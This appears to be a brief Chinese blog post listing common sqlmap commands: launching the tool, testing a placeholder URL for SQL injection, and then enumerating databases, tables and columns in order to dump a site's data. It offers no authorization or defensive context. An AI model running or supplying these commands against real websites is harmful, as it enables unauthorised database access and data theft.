1、启动
cmd 进入到sqlmap.py的路径
python sqlmap.py
2、检测URL是否是真的有注入
python sqlmap.py -u "http://xxxxx/my?type=d"
3、如果有注入,可以试下脱裤
-u URL
-D 数据库名
-T 表名
sqlmap -u "" --dbs
sqlmap -u "" -D "" --tables
sqlmap -u "" -D "" -T "" --columns
sqlmap 常用命令
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。
